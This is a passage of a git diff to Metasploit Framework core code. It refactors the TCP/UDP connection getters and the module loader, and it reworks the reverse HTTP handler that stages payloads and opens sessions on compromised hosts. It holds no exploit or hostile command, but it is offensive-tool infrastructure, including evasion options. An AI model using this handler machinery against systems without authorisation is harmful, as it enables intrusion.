datastore['VERBOSE'] - print_status(msg) - end - end - # The banner received after the initial connection to the server. This should look something like: # 220 mx.google.com ESMTP s5sm3837150wak.12 diff --git a/lib/msf/core/exploit/sunrpc.rb b/lib/msf/core/exploit/sunrpc.rb index f8c9055f30..265bea4ac5 100644 --- a/lib/msf/core/exploit/sunrpc.rb +++ b/lib/msf/core/exploit/sunrpc.rb @@ -31,7 +31,7 @@ module Exploit::Remote::SunRPC register_evasion_options( [ - OptBool.new('ONCRPC::tcp_request_fragmentation', [false, 'Enable fragmentation of TCP ONC/RPC requests', 'false']), + OptBool.new('ONCRPC::tcp_request_fragmentation', [false, 'Enable fragmentation of TCP ONC/RPC requests', false]), ], Msf::Exploit::Remote::SunRPC ) @@ -65,7 +65,7 @@ module Exploit::Remote::SunRPC } ) - if datastore['ONCRPC::tcp_request_fragmentation'] == true + if datastore['ONCRPC::tcp_request_fragmentation'] self.rpcobj.should_fragment = 1 end diff --git a/lib/msf/core/exploit/tcp.rb b/lib/msf/core/exploit/tcp.rb index 59577e7932..ec70f4ff4a 100644 --- a/lib/msf/core/exploit/tcp.rb +++ b/lib/msf/core/exploit/tcp.rb @@ -64,7 +64,7 @@ module Exploit::Remote::Tcp register_advanced_options( [ OptBool.new('SSL', [ false, 'Negotiate SSL/TLS for outgoing connections', false]), - OptEnum.new('SSLVersion', [ false, 'Specify the version of SSL/TLS to be used (TLS and SSL23 are auto-negotiate)', 'TLS1', ['SSL2', 'SSL3', 'SSL23', 'TLS', 'TLS1', 'TLS1.1', 'TLS1.2']]), + Opt::SSLVersion, OptEnum.new('SSLVerifyMode', [ false, 'SSL verification method', 'PEER', %W{CLIENT_ONCE FAIL_IF_NO_PEER_CERT NONE PEER}]), OptString.new('SSLCipher', [ false, 'String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"']), Opt::Proxies, @@ -82,11 +82,6 @@ module Exploit::Remote::Tcp ) end - # Returns the rhost:rport - def peer - "#{rhost}:#{rport}" - end - # # Establishes a TCP connection to the specified RHOST/RPORT # @@ -200,6 +195,14 @@ module Exploit::Remote::Tcp disconnect end + def print_prefix + if rhost + super + peer + " - " + else + super + end + end + ## # # Wrappers for getters @@ -207,17 +210,24 @@ module Exploit::Remote::Tcp ## # - # Returns the target host + # Returns the local host for outgoing connections # - def rhost - datastore['RHOST'] + def chost + datastore['CHOST'] end # - # Returns the remote port + # Returns the TCP connection timeout # - def rport - datastore['RPORT'] + def connect_timeout + datastore['ConnectTimeout'] + end + + # + # Returns the local port for outgoing connections + # + def cport + datastore['CPORT'] end # @@ -234,18 +244,30 @@ module Exploit::Remote::Tcp datastore['LPORT'] end - # - # Returns the local host for outgoing connections - # - def chost - datastore['CHOST'] + # Returns the rhost:rport + def peer + "#{rhost}:#{rport}" end # - # Returns the local port for outgoing connections + # Returns the proxy configuration # - def cport - datastore['CPORT'] + def proxies + datastore['Proxies'] + end + + # + # Returns the target host + # + def rhost + datastore['RHOST'] + end + + # + # Returns the remote port + # + def rport + datastore['RPORT'] end # @@ -262,20 +284,6 @@ module Exploit::Remote::Tcp datastore['SSLVersion'] end - # - # Returns the proxy configuration - # - def proxies - datastore['Proxies'] - end - - # - # Returns the TCP connection timeout - # - def connect_timeout - datastore['ConnectTimeout'] - end - # # Returns the SSL certification verification mechanism # diff --git a/lib/msf/core/exploit/tcp_server.rb b/lib/msf/core/exploit/tcp_server.rb index a86a7a2b25..b791465dfd 100644 --- a/lib/msf/core/exploit/tcp_server.rb +++ b/lib/msf/core/exploit/tcp_server.rb @@ -19,7 +19,6 @@ module Exploit::Remote::TcpServer [ OptBool.new('SSL', [ false, 'Negotiate SSL for incoming connections', false]), # SSLVersion is currently unsupported for TCP servers (only supported by clients at the moment) - # OptEnum.new('SSLVersion', [ false, 'Specify the version of SSL that should be used', 'TLS1', ['SSL2', 'SSL3', 'TLS1']]), OptPath.new('SSLCert', [ false, 'Path to a custom SSL certificate (default is randomly generated)']), OptAddress.new('SRVHOST', [ true, "The local host to listen on. This must be an address on the local machine or 0.0.0.0", '0.0.0.0' ]), OptPort.new('SRVPORT', [ true, "The local port to listen on.", 8080 ]), diff --git a/lib/msf/core/exploit/udp.rb b/lib/msf/core/exploit/udp.rb index 2a7eedce31..8b503dc4cd 100644 --- a/lib/msf/core/exploit/udp.rb +++ b/lib/msf/core/exploit/udp.rb @@ -107,17 +107,17 @@ module Exploit::Remote::Udp ## # - # Returns the target host + # Returns the local host for outgoing connections # - def rhost - datastore['RHOST'] + def chost + datastore['CHOST'] end # - # Returns the remote port + # Returns the local port for outgoing connections # - def rport - datastore['RPORT'] + def cport + datastore['CPORT'] end # @@ -135,20 +135,19 @@ module Exploit::Remote::Udp end # - # Returns the local host for outgoing connections + # Returns the target host # - def chost - datastore['CHOST'] + def rhost + datastore['RHOST'] end # - # Returns the local port for outgoing connections + # Returns the remote port # - def cport - datastore['CPORT'] + def rport + datastore['RPORT'] end - protected attr_accessor :udp_sock diff --git a/lib/msf/core/framework.rb b/lib/msf/core/framework.rb index c8fd5db9cb..b8e797c8ec 100644 --- a/lib/msf/core/framework.rb +++ b/lib/msf/core/framework.rb @@ -38,14 +38,6 @@ class Framework Revision = "$Revision$" - # Repository information - RepoRevision = ::Msf::Util::SVN.revision - RepoUpdated = ::Msf::Util::SVN.updated - RepoUpdatedDays = ::Msf::Util::SVN.days_since_update - RepoUpdatedDaysNote = ::Msf::Util::SVN.last_updated_friendly - RepoUpdatedDate = ::Msf::Util::SVN.last_updated_date - RepoRoot = ::Msf::Util::SVN.root - # EICAR canary EICARCorrupted = ::Msf::Util::EXE.is_eicar_corrupted? diff --git a/lib/msf/core/handler.rb b/lib/msf/core/handler.rb index eafe12f97f..2ed2842ba8 100644 --- a/lib/msf/core/handler.rb +++ b/lib/msf/core/handler.rb @@ -163,6 +163,14 @@ module Handler return session end + # + # Interrupts a wait_for_session call by notifying with a nil event + # + def interrupt_wait_for_session + return unless session_waiter_event + session_waiter_event.notify(nil) + end + # # Set by the exploit module to configure handler # diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb index e3d8b04ef5..d7380d2d2d 100644 --- a/lib/msf/core/handler/reverse_http.rb +++ b/lib/msf/core/handler/reverse_http.rb @@ -63,24 +63,19 @@ module ReverseHttp ], Msf::Handler::ReverseHttp) end - # Determine where to bind the server - # - # @return [String] - def listener_address - if datastore['ReverseListenerBindAddress'].to_s == '' - bindaddr = Rex::Socket.is_ipv6?(datastore['LHOST']) ? '::' : '0.0.0.0' + def print_prefix + if Thread.current[:cli] + super + "#{listener_uri} handling request from #{Thread.current[:cli].peerhost}; (UUID: #{uuid.to_s}) " else - bindaddr = datastore['ReverseListenerBindAddress'] + super end - - bindaddr end # Return a URI suitable for placing in a payload # # @return [String] A URI of the form +scheme://host:port/+ - def listener_uri - uri_host = Rex::Socket.is_ipv6?(listener_address) ? "[#{listener_address}]" : listener_address + def listener_uri(addr=datastore['LHOST']) + uri_host = Rex::Socket.is_ipv6?(addr) ? "[#{addr}]" : addr "#{scheme}://#{uri_host}:#{bind_port}/" end @@ -129,20 +124,33 @@ module ReverseHttp # def setup_handler + local_addr = nil local_port = bind_port + ex = false # Start the HTTPS server service on this host/port - self.service = Rex::ServiceManager.start(Rex::Proto::Http::Server, - local_port, - listener_address, - ssl?, - { - 'Msf' => framework, - 'MsfExploit' => self, - }, - nil, - (ssl?) ? datastore['HandlerSSLCert'] : nil - ) + bind_addresses.each do |ip| + begin + self.service = Rex::ServiceManager.start(Rex::Proto::Http::Server, + local_port, ip, ssl?, + { + 'Msf' => framework, + 'MsfExploit' => self, + }, + nil, + (ssl?) ? datastore['HandlerSSLCert'] : nil + ) + local_addr = ip + rescue + ex = $! + print_error("Handler failed to bind to #{ip}:#{local_port}") + else + ex = false + break + end + end + + raise ex if (ex) self.service.server_name = datastore['MeterpreterServerName'] @@ -156,7 +164,7 @@ module ReverseHttp }, 'VirtualDirectory' => true) - print_status("Started #{scheme.upcase} reverse handler on #{listener_uri}") + print_status("Started #{scheme.upcase} reverse handler on #{listener_uri(local_addr)}") lookup_proxy_settings if datastore['IgnoreUnknownPayloads'] @@ -224,6 +232,7 @@ protected # Parses the HTTPS request # def on_request(cli, req, obj) + Thread.current[:cli] = cli resp = Rex::Proto::Http::Response.new info = process_uri_resource(req.relative_resource) uuid = info[:uuid] || Msf::Payload::UUID.new @@ -241,7 +250,7 @@ protected # Validate known UUIDs for all requests if IgnoreUnknownPayloads is set if datastore['IgnoreUnknownPayloads'] && ! framework.uuid_db[uuid.puid_hex] - print_status("#{cli.peerhost}:#{cli.peerport} (UUID: #{uuid.to_s}) Ignoring unknown UUID: #{request_summary}") + print_status("Ignoring unknown UUID: #{request_summary}") info[:mode] = :unknown_uuid end @@ -249,7 +258,7 @@ protected if datastore['IgnoreUnknownPayloads'] && info[:mode].to_s =~ /^init_/ allowed_urls = framework.uuid_db[uuid.puid_hex]['urls'] || [] unless allowed_urls.include?(req.relative_resource) - print_status("#{cli.peerhost}:#{cli.peerport} (UUID: #{uuid.to_s}) Ignoring unknown UUID URL: #{request_summary}") + print_status("Ignoring unknown UUID URL: #{request_summary}") info[:mode] = :unknown_uuid_url end end @@ -259,7 +268,7 @@ protected # Process the requested resource. case info[:mode] when :init_connect - print_status("#{cli.peerhost}:#{cli.peerport} (UUID: #{uuid.to_s}) Redirecting stageless connection from #{request_summary}") + print_status("Redirecting stageless connection from #{request_summary}") # Handle the case where stageless payloads call in on the same URI when they # first connect. From there, we tell them to callback on a connect URI that @@ -272,7 +281,7 @@ protected resp.body = pkt.to_r when :init_python - print_status("#{cli.peerhost}:#{cli.peerport} (UUID: #{uuid.to_s}) Staging Python payload ...") + print_status("Staging Python payload ...") url = payload_uri(req) + conn_id + '/' blob = "" @@ -301,7 +310,7 @@ protected }) when :init_java - print_status("#{cli.peerhost}:#{cli.peerport} (UUID: #{uuid.to_s}) Staging Java payload ...") + print_status("Staging Java payload ...") url = payload_uri(req) + conn_id + "/\x00" blob = obj.generate_stage( @@ -325,38 +334,43 @@ protected }) when :init_native - print_status("#{cli.peerhost}:#{cli.peerport} (UUID: #{uuid.to_s}) Staging Native payload ...") + print_status("Staging Native payload ...") url = payload_uri(req) + conn_id + "/\x00" uri = URI(payload_uri(req) + conn_id) resp['Content-Type'] = 'application/octet-stream' - # generate the stage, but pass in the existing UUID and connection id so that - # we don't get new ones generated. - blob = obj.stage_payload( - uuid: uuid, - uri: conn_id, - lhost: uri.host, - lport: uri.port - ) + begin + # generate the stage, but pass in the existing UUID and connection id so that + # we don't get new ones generated. + blob = obj.stage_payload( + uuid: uuid, + uri: conn_id, + lhost: uri.host, + lport: uri.port + ) - resp.body = encode_stage(blob) + resp.body = encode_stage(blob) - # Short-circuit the payload's handle_connection processing for create_session - create_session(cli, { - :passive_dispatcher => obj.service, - :conn_id => conn_id, - :url => url, - :expiration => datastore['SessionExpirationTimeout'].to_i, - :comm_timeout => datastore['SessionCommunicationTimeout'].to_i, - :retry_total => datastore['SessionRetryTotal'].to_i, - :retry_wait => datastore['SessionRetryWait'].to_i, - :ssl => ssl?, - :payload_uuid => uuid - }) + # Short-circuit the payload's handle_connection processing for create_session + create_session(cli, { + :passive_dispatcher => obj.service, + :conn_id => conn_id, + :url => url, + :expiration => datastore['SessionExpirationTimeout'].to_i, + :comm_timeout => datastore['SessionCommunicationTimeout'].to_i, + :retry_total => datastore['SessionRetryTotal'].to_i, + :retry_wait => datastore['SessionRetryWait'].to_i, + :ssl => ssl?, + :payload_uuid => uuid + }) + rescue NoMethodError + print_error("Staging failed. This can occur when stageless listeners are used with staged payloads.") + return + end when :connect - print_status("#{cli.peerhost}:#{cli.peerport} (UUID: #{uuid.to_s}) Attaching orphaned/stageless session ...") + print_status("Attaching orphaned/stageless session ...") resp.body = '' conn_id = req.relative_resource @@ -376,7 +390,7 @@ protected else unless [:unknown_uuid, :unknown_uuid_url].include?(info[:mode]) - print_status("#{cli.peerhost}:#{cli.peerport} Unknown request to #{request_summary}") + print_status("Unknown request to #{request_summary}") end resp.code = 200 resp.message = 'OK' diff --git a/lib/msf/core/module.rb b/lib/msf/core/module.rb index fda6eebe8c..fe39a459b3 100644 --- a/lib/msf/core/module.rb +++ b/lib/msf/core/module.rb @@ -266,11 +266,10 @@ class Module end # - # Returns true if this module is being debugged. The debug flag is set - # by setting datastore['DEBUG'] to 1|true|yes + # Returns true if this module is being debugged. # def debugging? - (datastore['DEBUG'] || '') =~ /^(1|t|y)/i + datastore['DEBUG'] end # diff --git a/lib/msf/core/module/deprecated.rb b/lib/msf/core/module/deprecated.rb index 2879223d2f..64c846058b 100644 --- a/lib/msf/core/module/deprecated.rb +++ b/lib/msf/core/module/deprecated.rb @@ -60,15 +60,15 @@ module Msf::Module::Deprecated # # @return [void] def print_deprecation_warning - print_warning("*"*72) - print_warning("*%red"+"The module #{refname} is deprecated!".center(70)+"%clr*") + print_warning("*"*90) + print_warning("*%red"+"The module #{refname} is deprecated!".center(88)+"%clr*") if deprecation_date - print_warning("*"+"It will be removed on or about #{deprecation_date}".center(70)+"*") + print_warning("*"+"It will be removed on or about #{deprecation_date}".center(88)+"*") end if replacement_module - print_warning("*"+"Use #{replacement_module} instead".center(70)+"*") + print_warning("*"+"Use #{replacement_module} instead".center(88)+"*") end - print_warning("*"*72) + print_warning("*"*90) end def init_ui(input = nil, output = nil) diff --git a/lib/msf/core/module/ui/message.rb b/lib/msf/core/module/ui/message.rb index 7370ded212..c706a35702 100644 --- a/lib/msf/core/module/ui/message.rb +++ b/lib/msf/core/module/ui/message.rb @@ -13,11 +13,10 @@ module Msf::Module::UI::Message end def print_prefix - ret = '' - if (datastore['TimestampOutput'] =~ /^(t|y|1)/i) || ( - framework && framework.datastore['TimestampOutput'] =~ /^(t|y|1)/i - ) - prefix = "[#{Time.now.strftime("%Y.%m.%d-%H:%M:%S")}] " + prefix = '' + if datastore['TimestampOutput'] || + (framework && framework.datastore['TimestampOutput']) + prefix << "[#{Time.now.strftime("%Y.%m.%d-%H:%M:%S")}] " xn ||= datastore['ExploitNumber'] xn ||= framework.datastore['ExploitNumber'] @@ -25,9 +24,8 @@ module Msf::Module::UI::Message prefix << "[%04d] " % xn end - ret = prefix end - ret + prefix end def print_status(msg='') @@ -37,4 +35,4 @@ module Msf::Module::UI::Message def print_warning(msg='') super(print_prefix + msg) end -end \ No newline at end of file +end diff --git a/lib/msf/core/module/ui/message/verbose.rb b/lib/msf/core/module/ui/message/verbose.rb index 1a8d0175b9..a47a7e8f11 100644 --- a/lib/msf/core/module/ui/message/verbose.rb +++ b/lib/msf/core/module/ui/message/verbose.rb @@ -1,21 +1,21 @@ module Msf::Module::UI::Message::Verbose # Verbose version of #print_error def vprint_error(msg='') - print_error(msg) if datastore['VERBOSE'] || framework.datastore['VERBOSE'] + print_error(msg) if datastore['VERBOSE'] || (!framework.nil? && framework.datastore['VERBOSE']) end # Verbose version of #print_good def vprint_good(msg='') - print_good(msg) if datastore['VERBOSE'] || framework.datastore['VERBOSE'] + print_good(msg) if datastore['VERBOSE'] || (!framework.nil? && framework.datastore['VERBOSE']) end # Verbose version of #print_status def vprint_status(msg='') - print_status(msg) if datastore['VERBOSE'] || framework.datastore['VERBOSE'] + print_status(msg) if datastore['VERBOSE'] || (!framework.nil? && framework.datastore['VERBOSE']) end # Verbose version of #print_warning def vprint_warning(msg='') - print_warning(msg) if datastore['VERBOSE'] || framework.datastore['VERBOSE'] + print_warning(msg) if datastore['VERBOSE'] || (!framework.nil? && framework.datastore['VERBOSE']) end end diff --git a/lib/msf/core/module_manager.rb b/lib/msf/core/module_manager.rb index c8ebc14c21..0fe7794797 100644 --- a/lib/msf/core/module_manager.rb +++ b/lib/msf/core/module_manager.rb @@ -120,6 +120,7 @@ module Msf self.module_info_by_path = {} self.enablement_by_type = {} self.module_load_error_by_path = {} + self.module_load_warnings = {} self.module_paths = [] self.module_set_by_type = {} @@ -146,11 +147,6 @@ module Msf # @param klass [Class] The module class # @return [void] def auto_subscribe_module(klass) - # If auto-subscribe has been disabled - if (framework.datastore['DisableAutoSubscribe'] and - framework.datastore['DisableAutoSubscribe'] =~ /^(y|1|t)/) - return - end # If auto-subscription is enabled (which it is by default), figure out # if it subscribes to any particular interfaces. diff --git a/lib/msf/core/module_manager/loading.rb b/lib/msf/core/module_manager/loading.rb index c5900bd15a..c7bb4a0bb5 100644 --- a/lib/msf/core/module_manager/loading.rb +++ b/lib/msf/core/module_manager/loading.rb @@ -50,7 +50,7 @@ module Msf::ModuleManager::Loading changed end - attr_accessor :module_load_error_by_path + attr_accessor :module_load_error_by_path, :module_load_warnings # Called when a module is initially loaded such that it can be categorized # accordingly. @@ -122,4 +122,4 @@ module Msf::ModuleManager::Loading count_by_type end -end \ No newline at end of file +end diff --git a/lib/msf/core/modules/loader/base.rb b/lib/msf/core/modules/loader/base.rb index 5f4586efd6..3ed5bb8c21 100644 --- a/lib/msf/core/modules/loader/base.rb +++ b/lib/msf/core/modules/loader/base.rb @@ -3,9 +3,7 @@ # Project # require 'msf/core/modules/loader' -require 'msf/core/modules/namespace' -require 'msf/core/modules/metasploit_class_compatibility_error' -require 'msf/core/modules/version_compatibility_error' +require 'msf/core/modules/error' # Responsible for loading modules for {Msf::ModuleManager}. # @@ -30,9 +28,6 @@ class Msf::Modules::Loader::Base # By calling module_eval from inside the module definition, the lexical scope is captured and available to the code in # module_content. NAMESPACE_MODULE_CONTENT = <<-EOS - # ensure the namespace module can respond to checks during loading - extend Msf::Modules::Namespace - class << self # The loader that originally loaded this module # @@ -103,12 +98,9 @@ class Msf::Modules::Loader::Base # @option options [Boolean] :reload (false) whether this is a reload. # # @return [false] if :force is false and parent_path has not changed. - # @return [false] if exception encountered while parsing module - # content - # @return [false] if the module is incompatible with the Core or API - # version. - # @return [false] if the module does not implement a Metasploit(\d+) - # class. + # @return [false] if exception encountered while parsing module content + # @return [false] if the module is incompatible with the Core or API version. + # @return [false] if the module does not implement a Metasploit class. # @return [false] if the module's is_usable method returns false. # @return [true] if all those condition pass and the module is # successfully loaded. @@ -131,8 +123,6 @@ class Msf::Modules::Loader::Base reload ||= force || file_changed - metasploit_class = nil - module_content = read_module_content(parent_path, type, module_reference_name) if module_content.empty? @@ -140,6 +130,7 @@ class Msf::Modules::Loader::Base return false end + klass = nil try_eval_module = lambda { |namespace_module| # set the parent_path so that the module can be reloaded with #load_module namespace_module.parent_path = parent_path @@ -150,41 +141,24 @@ class Msf::Modules::Loader::Base rescue ::Interrupt raise rescue ::Exception => error - # Hide eval errors when the module version is not compatible - begin - namespace_module.version_compatible!(module_path, module_reference_name) - rescue Msf::Modules::VersionCompatibilityError => version_compatibility_error - load_error(module_path, version_compatibility_error) - else - load_error(module_path, error) - end - - return false - end - - begin - namespace_module.version_compatible!(module_path, module_reference_name) - rescue Msf::Modules::VersionCompatibilityError => version_compatibility_error - load_error(module_path, version_compatibility_error) - - return false - end - - begin - metasploit_class = namespace_module.metasploit_class!(module_path, module_reference_name) - rescue Msf::Modules::MetasploitClassCompatibilityError => error load_error(module_path, error) - return false end - unless usable?(metasploit_class) - ilog( - "Skipping module (#{module_reference_name} from #{module_path}) because is_usable returned false.", - 'core', - LEV_1 - ) - + if namespace_module.const_defined?('Metasploit3', false) + klass = namespace_module.const_get('Metasploit3', false) + load_warning(module_path, 'Please change the modules class name from Metasploit3 to MetasploitModule') + elsif namespace_module.const_defined?('Metasploit4', false) + klass = namespace_module.const_get('Metasploit4', false) + load_warning(module_path, 'Please change the modules class name from Metasploit4 to MetasploitModule') + elsif namespace_module.const_defined?('MetasploitModule', false) + klass = namespace_module.const_get('MetasploitModule', false) + else + load_error(module_path, Msf::Modules::Error.new({ + :module_path => module_path, + :module_reference_name => module_reference_name, + :causal_message => 'Invalid module (no MetasploitModule class or module name)' + })) return false end @@ -206,7 +180,7 @@ class Msf::Modules::Loader::Base # Do some processing on the loaded module to get it into the right associations module_manager.on_module_load( - metasploit_class, + klass, type, module_reference_name, { @@ -339,9 +313,9 @@ class Msf::Modules::Loader::Base protected - # Returns a nested module to wrap the Metasploit(1|2|3) class so that it doesn't overwrite other (metasploit) - # module's classes. The wrapper module must be named so that active_support's autoloading code doesn't break when - # searching constants from inside the Metasploit(1|2|3) class. + # Returns a nested module to wrap the MetasploitModule class so that it doesn't overwrite other (metasploit) + # module's classes. The wrapper module must be named so that active_support's autoloading code doesn't break when + # searching constants from inside the Metasploit class. # # @param namespace_module_names [Array] # {NAMESPACE_MODULE_NAMES} + @@ -351,7 +325,7 @@ class Msf::Modules::Loader::Base # @see NAMESPACE_MODULE_CONTENT def create_namespace_module(namespace_module_names) # In order to have constants defined in Msf resolve without the Msf qualifier in the module_content, the - # Module.nesting must resolve for the entire nesting. Module.nesting is strictly lexical, and can't be faked with + # Module.nesting must resolve for the entire nesting. Module.nesting is strictly lexical, and can't be faked with # module_eval(&block). (There's actually code in ruby's implementation to stop module_eval from being added to # Module.nesting when using the block syntax.) All this means is the modules have to be declared as a string that # gets module_eval'd. @@ -432,13 +406,32 @@ class Msf::Modules::Loader::Base log_lines << "#{module_path} failed to load due to the following error:" log_lines << error.class.to_s log_lines << error.to_s - log_lines << "Call stack:" - log_lines += error.backtrace + if error.backtrace + log_lines << "Call stack:" + log_lines += error.backtrace + end log_message = log_lines.join("\n") elog(log_message) end + # Records the load warning to {Msf::ModuleManager::Loading#module_load_warnings} and the log. + # + # @param [String] module_path Path to the module as returned by {#module_path}. + # @param [String] Error message that caused the warning. + # @return [void] + # + # @see #module_path + def load_warning(module_path, error) + module_manager.module_load_warnings[module_path] = error.to_s + + log_lines = [] + log_lines << "#{module_path} generated a warning during load:" + log_lines << error.to_s + log_message = log_lines.join("\n") + wlog(log_message) + end + # @return [Msf::ModuleManager] The module manager for which this loader is loading modules. attr_reader :module_manager @@ -455,7 +448,7 @@ class Msf::Modules::Loader::Base raise ::NotImplementedError end - # Returns whether the path could refer to a module. The path would still need to be loaded in order to check if it + # Returns whether the path could refer to a module. The path would still need to be loaded in order to check if it # actually is a valid module. # # @param [String] path to module without the type directory. @@ -502,8 +495,8 @@ class Msf::Modules::Loader::Base end # Returns an Array of names to make a fully qualified module name to - # wrap the Metasploit(1|2|3) class so that it doesn't overwrite other - # (metasploit) module's classes. Invalid module name characters are + # wrap the MetasploitModule class so that it doesn't overwrite other + # (metasploit) module's classes. Invalid module name characters are # escaped by using 'H*' unpacking and prefixing each code with X so # the code remains a valid module name when it starts with a digit. # @@ -626,28 +619,4 @@ class Msf::Modules::Loader::Base self.class.typed_path(type, module_reference_name) end - # Returns whether the metasploit_class is usable on the current system. Defer's to metasploit_class's #is_usable if - # it is defined. - # - # @param [Msf::Module] metasploit_class As returned by {Msf::Modules::Namespace#metasploit_class} - # @return [false] if metasploit_class.is_usable returns false. - # @return [true] if metasploit_class does not respond to is_usable. - # @return [true] if metasploit_class.is_usable returns true. - def usable?(metasploit_class) - # If the module indicates that it is not usable on this system, then we - # will not try to use it. - usable = false - - if metasploit_class.respond_to? :is_usable - begin - usable = metasploit_class.is_usable - rescue => error - elog("Exception caught during is_usable check: #{error}") - end - else - usable = true - end - - usable - end end diff --git a/lib/msf/core/modules/loader/directory.rb b/lib/msf/core/modules/loader/directory.rb index 46f182e4f6..f311e4b767 100644 --- a/lib/msf/core/modules/loader/directory.rb +++ b/lib/msf/core/modules/loader/directory.rb @@ -32,10 +32,6 @@ class Msf::Modules::Loader::Directory < Msf::Modules::Loader::Base def each_module_reference_name(path, opts={}) whitelist = opts[:whitelist] || [] ::Dir.foreach(path) do |entry| - if entry.downcase == '.svn' - next - end - full_entry_path = ::File.join(path, entry) type = entry.singularize diff --git a/lib/msf/core/modules/metasploit_class_compatibility_error.rb b/lib/msf/core/modules/metasploit_class_compatibility_error.rb deleted file mode 100644 index ae829392cf..0000000000 --- a/lib/msf/core/modules/metasploit_class_compatibility_error.rb +++ /dev/null @@ -1,14 +0,0 @@ -# -*- coding: binary -*- -require 'msf/core/modules/error' - -# Error raised by {Msf::Modules::Namespace#metasploit_class!} if it cannot the namespace_module does not have a constant -# with {Msf::Framework::Major} or lower as a number after 'Metasploit', which indicates a compatible Msf::Module. -class Msf::Modules::MetasploitClassCompatibilityError < Msf::Modules::Error - def initialize(attributes={}) - super_attributes = { - :causal_message => 'Missing compatible Metasploit class constant', - }.merge(attributes) - - super(super_attributes) - end -end \ No newline at end of file diff --git a/lib/msf/core/modules/namespace.rb b/lib/msf/core/modules/namespace.rb deleted file mode 100644 index fa65f5fa26..0000000000 --- a/lib/msf/core/modules/namespace.rb +++ /dev/null @@ -1,76 +0,0 @@ -# -*- coding: binary -*- -require 'metasploit/framework/api/version' -require 'metasploit/framework/core/version' - -# Concern for behavior that all namespace modules that wrap Msf::Modules must support like version checking and -# grabbing the version specific-Metasploit* class. -module Msf::Modules::Namespace - # Returns the Metasploit(3|2|1) class from the module_evalled content. - # - # @note The module content must be module_evalled into this namespace module before the return of - # {#metasploit_class} is valid. - # - # @return [Msf::Module] if a Metasploit(3|2|1) class exists in this module - # @return [nil] if such as class is not defined. - def metasploit_class - metasploit_class = nil - - ::Msf::Framework::Major.downto(1) do |major| - # Since we really only care about the deepest namespace, we don't - # need to look for parents' constants. However, the "inherit" - # parameter for const_defined? only exists after 1.9. If we ever - # drop 1.8 support, we can save a few cycles here by passing false - # here. - if const_defined?("Metasploit#{major}") - metasploit_class = const_get("Metasploit#{major}") - - break - end - end - - metasploit_class - end - - def metasploit_class!(module_path, module_reference_name) - metasploit_class = self.metasploit_class - - unless metasploit_class - raise Msf::Modules::MetasploitClassCompatibilityError.new( - :module_path => module_path, - :module_reference_name => module_reference_name - ) - end - - metasploit_class - end - - # Raises an error unless {Msf::Framework::VersionCore} and {Msf::Framework::VersionAPI} meet the minimum required - # versions defined in RequiredVersions in the module content. - # - # @note The module content must be module_evalled into this namespace module using module_eval_with_lexical_scope - # before calling {#version_compatible!} is valid. - # - # @param [String] module_path Path from where the module was read. - # @param [String] module_reference_name The canonical name for the module. - # @raise [Msf::Modules::VersionCompatibilityError] if RequiredVersion[0] > Msf::Framework::VersionCore or - # RequiredVersion[1] > Msf::Framework::VersionApi - # @return [void] - def version_compatible!(module_path, module_reference_name) - if const_defined?(:RequiredVersions) - required_versions = const_get(:RequiredVersions) - minimum_core_version = Gem::Version.new(required_versions[0].to_s) - minimum_api_version = Gem::Version.new(required_versions[1].to_s) - - if (minimum_core_version > Metasploit::Framework::Core::GEM_VERSION || - minimum_api_version > Metasploit::Framework::API::GEM_VERSION) - raise Msf::Modules::VersionCompatibilityError.new( - :module_path => module_path, - :module_reference_name => module_reference_name, - :minimum_api_version => minimum_api_version, - :minimum_core_version => minimum_core_version - ) - end - end - end -end - diff --git a/lib/msf/core/modules/version_compatibility_error.rb b/lib/msf/core/modules/version_compatibility_error.rb deleted file mode 100644 index fb52be3fc8..0000000000 --- a/lib/msf/core/modules/version_compatibility_error.rb +++ /dev/null @@ -1,52 +0,0 @@ -# -*- coding: binary -*- -require 'msf/core/modules/error' - -# Error raised by {Msf::Modules::Namespace#version_compatible!} on {Msf::Modules::Loader::Base#create_namespace_module} -# if the API or Core version does not meet the minimum requirements defined in the RequiredVersions constant in the -# {Msf::Modules::Loader::Base#read_module_content module content}. -class Msf::Modules::VersionCompatibilityError < Msf::Modules::Error - # @param [Hash{Symbol => Float}] attributes - # @option attributes [Float] :minimum_api_version The minimum {Msf::Framework::VersionAPI} as defined in - # RequiredVersions. - # @option attributes [Float] :minimum_core_version The minimum {Msf::Framework::VersionCore} as defined in - # RequiredVersions. - def initialize(attributes={}) - @minimum_api_version = attributes[:minimum_api_version] - @minimum_core_version = attributes[:minimum_core_version] - - message_parts = [] - message_parts << 'version check' - - if minimum_api_version or minimum_core_version - clause_parts = [] - - if minimum_api_version - clause_parts << "API >= #{minimum_api_version}" - end - - if minimum_core_version - clause_parts << "Core >= #{minimum_core_version}" - end - - clause = clause_parts.join(' and ') - message_parts << "(requires #{clause})" - end - - causal_message = message_parts.join(' ') - - super_attributes = { - :causal_message => causal_message - }.merge(attributes) - - super(super_attributes) - end - - # @return [Float] The minimum value of {Msf::Framework::VersionAPI} for the module to be compatible. - attr_reader :minimum_api_version - # @return [Float] The minimum value of {Msf::Framework::VersionCore} for the module to be compatible. - attr_reader :minimum_core_version - # @return [String] the path to the module that declared the RequiredVersions - attr_reader :module_path - # @return [String] the module reference name that declared the RequiredVersions - attr_reader :module_reference_name -end \ No newline at end of file diff --git a/lib/msf/core/opt.rb b/lib/msf/core/opt.rb index 3df70e099a..a1a53a2c87 100644 --- a/lib/msf/core/opt.rb +++ b/lib/msf/core/opt.rb @@ -51,6 +51,13 @@ module Msf Msf::OptPort.new(__method__.to_s, [ required, desc, default ]) end + # @return [OptEnum] + def self.SSLVersion + Msf::OptEnum.new('SSLVersion', [ false, + 'Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate)', 'Auto', + ['Auto', 'SSL2', 'SSL3', 'SSL23', 'TLS', 'TLS1', 'TLS1.1', 'TLS1.2']]) + end + # These are unused but remain for historical reasons class << self alias builtin_chost CHOST @@ -69,6 +76,7 @@ module Msf Proxies = Proxies() RHOST = RHOST() RPORT = RPORT() + SSLVersion = SSLVersion() end end diff --git a/lib/msf/core/opt_address_range.rb b/lib/msf/core/opt_address_range.rb index 50c1653971..13dbe4bcd1 100644 --- a/lib/msf/core/opt_address_range.rb +++ b/lib/msf/core/opt_address_range.rb @@ -12,6 +12,10 @@ class OptAddressRange < OptBase return 'addressrange' end + def validate_on_assignment? + false + end + def normalize(value) return nil unless value.kind_of?(String) if (value =~ /^file:(.*)/) diff --git a/lib/msf/core/opt_base.rb 